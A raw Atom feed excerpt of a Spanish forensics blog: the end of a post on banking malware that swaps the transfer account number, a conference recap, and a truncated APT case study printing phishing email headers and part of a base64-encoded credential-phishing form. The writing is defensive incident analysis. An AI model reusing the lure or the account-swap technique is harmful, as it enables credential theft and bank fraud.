src="http://1.bp.blogspot.com/-zdKhQE_XBAs/ToLsSk3CLDI/AAAAAAAACgU/UOBbot-B5aY/s400/3.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Pantalla del Tamper Data&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Una vez lanzado, Tamper Data nos muestra en el mismo momento de pulsar el botón 'confirmar' los campos que van a ser enviados y entre ellos el campo 'cuentaDestino' que contiene un número de cuenta que nada tiene que ver con el puesto en la cuenta de abono . Es decir el número de cuenta de abono '*52 07006*', es sustituido por un número de cuenta con destino en Rumanía.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-BxStnLWbLjA/ToLsZIb6xJI/AAAAAAAACgY/STKgkfr-8PY/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="168" src="http://3.bp.blogspot.com/-BxStnLWbLjA/ToLsZIb6xJI/AAAAAAAACgY/STKgkfr-8PY/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;En este paso y como en casi todas las bancas electrónicas se nos pide la operación de firma, es decir o bien una posición de la tarjeta de coordenadas, un token o una clave de un sólo uso que se puede enviar al móvil.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;El usuario confiado y dado que ve en pantalla (que no en el post de envío) un número de cuenta corriente conocido procede a utilizarlo y pulsar la confirmación. Es aquí donde desaparecen 1.000€&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Como decia anteriormente, está técnica ya no es funcional para los piratas dado que la entidad puso medidas correctoras, pero eso ya será en otro post, que hoy vengo de viaje y estoy algo cansado.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-2570983463870027314?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/2570983463870027314/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=2570983463870027314' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2570983463870027314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2570983463870027314'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/09/el-fraude-ware-te-vigila-otro-de-apt.html' title='El fraude-ware te vigila. Otro de APT'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-USw9f0sDmaI/ToTJYpbb2AI/AAAAAAAACgc/62bnYHngnz0/s72-c/Captura.PNG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-7800907079813517266</id><published>2011-09-19T18:02:00.001+02:00</published><updated>2011-09-19T18:02:38.802+02:00</updated><title type='text'>Y otra NcN que finaliza...</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-6LjkA1klnGo/Tndi8RyNmII/AAAAAAAACfc/u984MfOkvv8/s1600/Captura+de+pantalla+2011-09-19+a+la%2528s%2529+17.40.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="104" src="http://3.bp.blogspot.com/-6LjkA1klnGo/Tndi8RyNmII/AAAAAAAACfc/u984MfOkvv8/s200/Captura+de+pantalla+2011-09-19+a+la%2528s%2529+17.40.26.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Este fin de semana se celebró la &lt;a href="http://noconname.org/"&gt;No cON Name (NcN)&lt;/a&gt;, uno de los congresos más esperados (junto a la &lt;a href="http://www.rootedcon.es/"&gt;Rooted Con&lt;/a&gt;) en el que se congregan cientos de personas que nos dedicamos a la seguridad informática. Para mi es un evento especial dado que lo sigo desde sus comienzos y allí nos juntamos viejos/jovenes conocidos para debatir y compartir.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mi intervención fue fugaz dado que llegue con el tiempo justo y me fui "cagando leches" dado que tenía un fuego que apagar. Espero que al año que viene me pueda quedar en todas las jornadas.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mi conferencia trato sobre "&lt;b&gt;Seguridad informática en entornos militares&lt;/b&gt;" un tema que me apasiona enormemente y mas enfocado a los entrenamientos &lt;a href="http://www.cwid.org/"&gt;CWID&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-8hzuPuITTCo/TndkYSwRadI/AAAAAAAACfk/EO7DEL-4Cpw/s1600/estudio.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-8hzuPuITTCo/TndkYSwRadI/AAAAAAAACfk/EO7DEL-4Cpw/s320/estudio.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Por otro lado las conferencias debieron de ser una maravilla tal y como cuenta Lorenzo en su entrada en &lt;a href="http://www.securitybydefault.com/2011/09/resumen-de-noconname-2011-ncn2k11.html"&gt;Security By Default&lt;/a&gt;&amp;nbsp;y pronto (quizás la semana que viene) estén las presentaciones disponibles para todos.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Un congreso muy bien organizado y altamente recomendable para aprender y compartir.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Valga este post, para insistir que en España disponemos de muy buenos investigadores de seguridad informática y como los buenos futbolistas se están exportando fuera de nuestro país.&lt;br /&gt;&lt;br /&gt;En cuanto a mi espero volver a vernos en el siguiente 'sarao' que no se si es el asegur@IT de Chema o el de ciber-policias o el congreso Xtreland, a buen seguro en alguno nos vemos.&amp;nbsp;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-7800907079813517266?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/7800907079813517266/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=7800907079813517266' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/7800907079813517266'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/7800907079813517266'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/09/y-otra-ncn-que-finaliza.html' title='Y otra NcN que finaliza...'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-6LjkA1klnGo/Tndi8RyNmII/AAAAAAAACfc/u984MfOkvv8/s72-c/Captura+de+pantalla+2011-09-19+a+la%2528s%2529+17.40.26.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-8290557536881937950</id><published>2011-09-09T13:00:00.000+02:00</published><updated>2011-09-09T13:00:19.784+02:00</updated><title type='text'>Un ataque persistente (APT)</title><content type='html'>Hola lectores,&lt;br /&gt;&lt;br /&gt;Perdón por el retraso, es lo que hay, mucho trabajo y que no falte que estamos en crisis. :-)&lt;br /&gt;&lt;br /&gt;Ha sido un verano movido con mis nuevas funciones y casi no he parado, motivo que hace que no pueda escribir con la misma frecuencia de antes. No obstante CONEXIONINVERSA siempre será un punto de encuentro donde exponer todo lo que aprendo, especialmente en aquellos casos divertidos y complejos y que puedan de alguna forma ayudar a todos los que os guste este maravilloso mundo del Análisis Forense Informático.&lt;br /&gt;&lt;br /&gt;Hoy vamos a ver un ataque especifico, insidioso y pensado para hacer mucho daño.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Advance Persistent Threat&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Es un concepto que muchos ya sabréis este se denomina APT que significa Advance Persistent Threat, que no es otra cosa que un nuevo vector de ataque que tiene un propósito definido y que su objetivo es abrir una brecha o fallo de seguridad sin que la empresa tenga constancia de que la tiene y de ahí robar la mayor información posible.&lt;br /&gt;&lt;br /&gt;Es un tipo de ataque que se alarga en el tiempo y suele pasar inadvertido por usuarios y administradores de sistemas. Los atacantes suelen actuar en equipo y poseen altos conocimientos de seguridad informática. Muchos de estos ataques son financiados por gobiernos o el cibercrimen y tienen relaciones políticas, económicas o militares. Aquí interviene el dicho "la información es poder".&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;b&gt;EL CASO&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En el mes de Julio estuve colaborando con una compañía que de forma rutinaria descubrió con asombro que su empresa era objeto de un ataque APT.&lt;br /&gt;&lt;br /&gt;Según me comentaba el cliente (una firma de alto prestigio internacional dedicada a la auditoría y consultoría) nada les hacia pensar que ellos mismos podrían ser objetivos de un ataque de esta magnitud. A día de hoy, los dirigentes de esta compañía no son capaces de cuantificar &amp;nbsp;que y cuanto ha podido ser sustraído y que problemas les puede venir en el futuro.&lt;br /&gt;&lt;br /&gt;Nuestro caso empieza con una simple alerta de un usuario (un directivo) &amp;nbsp;que dice haber recibido un correo de un colaborador externo (de otro directivo) y en el que le solicitan que introduzca las credenciales de una cuenta de gmail (que el no dispone) para el acceso a unos documentos de Google Docs. Tras una revisión por parte de los administradores se detecta que han recibido cientos de correos dirigidos a empleados solicitando las claves de gmail de los usuarios.&lt;br /&gt;&lt;br /&gt;Hasta aquí puede ser otro caso más de phising y los administradores podrían haber marcado el correo y 'santas pascuas', nadie se hubiera enterado, pero parece ser que muchos usuarios han introducido las claves y han abierto estos documentos, detectando más tarde como veremos que se han infectado con un curioso malware.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ANALISIS DEL ATAQUE:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Procedemos tras unos días de investigación, a revisar los correos que los usuarios han recibido.&lt;br /&gt;&lt;br /&gt;Como decía anteriormente, las víctimas reciben un mensaje desde una dirección de email que aparentemente es de un estrecho colaborador de una de las empresas que forman este grupo empresarial y &amp;nbsp;que evidentemente mas tarde se demostró que es falsa. El contenido del correo es un formulario que 'invita' a introducir las credenciales de 'gmail' para acceder a Google Docs con un sugerente contenido de correo con ficheros adjuntos de nombres "Technical_Airport_Docs.docx" "Report_confidential_employees.xls".&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-XeR0QLgm7GY/Tl4y_Fq3QFI/AAAAAAAACd0/X9neuDGweRo/s1600/Captura+de+pantalla+2011-08-31+a+la%2528s%2529+15.09.09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="http://3.bp.blogspot.com/-XeR0QLgm7GY/Tl4y_Fq3QFI/AAAAAAAACd0/X9neuDGweRo/s400/Captura+de+pantalla+2011-08-31+a+la%2528s%2529+15.09.09.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;El formulario HTML está codificado en Base64 y las cabeceras del correo vienen a decir lo siguiente:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;........................&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Received: from omh-ma01.r1000.mx.aol.com (omh-ma01.r1000.mx.aol.com [172.29.41.7])&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; by mtaout-da03.r1000.mx.aol.com (MUA/Third Party Client Interface) with ESMTP id 663DEE0000F1&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; for XXXXXXXX@gmail.com&amp;gt;; Tue,&amp;nbsp; 11 Jul 2011 12:32:11 -0400&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Received: from mtaout-ma02.r1000.mx.aol.com (mtaout-ma02.r1000.mx.aol.com [172.29.41.2])&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; by omh-ma01.r1000.mx.aol.com (AOL Outbound Holding Interface) with ESMTP id 5CDF8E000086&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; for XXXXXXXX@gmail.com&amp;gt;; Tue, &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;11 Jul 2011 12:32:11&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;-0400&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Received: from web-server (unknown [122.146.219.130])&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; by mtaout-ma02.r1000.mx.aol.com (MUA/Third Party Client Interface) with SMTP id 40157E000F42&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; for XXXXXXXX@gmail.com&amp;gt;; Tue, &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;11 Jul 2011 12:32:11&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;-0400&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Date: Tue,&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;span style="color: #073763;"&gt;11 Jul 2011 12:32:11&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;From: XXXXXXXXXXXXX&lt;lbrowbrw@aol.com&gt;&lt;/lbrowbrw@aol.com&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;To: XXXXXXXXXX&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Subject: Nueva documentación: Novedades&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;X-Mailer:&amp;nbsp;&lt;b&gt;&lt;span style="color: red;"&gt;Foxmail 6, 10, 201, 20&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&amp;nbsp; -&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: red;"&gt;&amp;nbsp;Foxmail es muy utilizado en China para realizar ataques de phising&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Mime-Version: 1.0&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Content-Type: text/html;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Content-Transfer-Encoding: base64&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;X-AOL-SCOLL-SCORE: 1:2:254689392:93952408&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;X-AOL-SCOLL-URL_COUNT: 2&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;X-AOL-IP:&amp;nbsp;&lt;span style="color: red;"&gt;122.146.219.130&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&amp;nbsp; - &lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="color: red;"&gt;Ubicado en Taipei en Taiwan&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;x-aol-global-disposition: G&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;X-AOL-SCOLL-SCORE: 1:2:278191424:93952408&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;X-AOL-SCOLL-URL_COUNT: 2&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;x-aol-sid: 3039ac1d33834e37e77f14f3&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;PGI+WW91ciBhY2NvdW50IHdpbGwgYmUgbG9ja2VkIGZvciB1bnVzdWFsIGFjY291bnQgYWN0&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;aXZpdHksIHdoaWNoIGluY2x1ZGVzLCBidXQgaXMgbm90IGxpbWl0ZWQgdG86PGJyPg0KPG9s&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;Pg0KPGxpPlJlY2VpdmluZywgZGVsZXRpbmcsIG9yIGRvd25sb2FkaW5nIGxhcmdlIGFtb3Vu&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;dHMgb2YgbWFpbCB2aWEgUE9QIG9yIElNQVAgaW4gYSBzaG9ydCBwZXJpb2Qgb2YgdGltZS48&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;L2xpPg0KPGxpPlNlbmRpbmcgYSBsYXJnZSBudW1iZXIgb2YgdW5kZWxpdmVyYWJsZSBtZXNz&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;YWdlcyAobWVzc2FnZXMgdGhhdCBib3VuY2UgYmFjaykuPC9saT4NCjxsaT5Vc2luZyBmaWxl&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;LXNoYXJpbmcgb3IgZmlsZS1zdG9yYWdlIHNvZnR3YXJlLCBicm93c2VyIGV4dGVuc2lvbnMs&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="color: #073763;"&gt;IG9yIHRoaXJkIHBhcnR5IHNvZnR3YXJlIHRoYXQgYXV0b21hdGljYWxseSBsb2dzIGluIHRv&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #073763; font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&lt;b&gt;........truncado a 